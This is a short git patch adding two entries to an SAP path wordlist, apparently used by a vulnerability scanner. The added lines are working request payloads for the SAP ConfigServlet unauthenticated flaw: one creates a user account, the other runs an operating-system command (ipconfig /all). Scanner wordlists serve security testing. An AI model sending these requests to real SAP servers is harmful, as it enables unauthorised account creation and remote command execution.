From d1bdc1d65a2b7580b140ceb0780fc61da8d6d293 Mon Sep 17 00:00:00 2001
From: JT <shipcodez@gmail.com>
Date: Sun, 14 Dec 2014 18:37:07 +0800
Subject: [PATCH] Update sap.txt

adding SAP ConfigServlet Remote Unauthenticated Payload Execution
---
 vulns/sap.txt | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/vulns/sap.txt b/vulns/sap.txt
index b46b1865..1d146308 100755
--- a/vulns/sap.txt
+++ b/vulns/sap.txt
@@ -92,6 +92,8 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite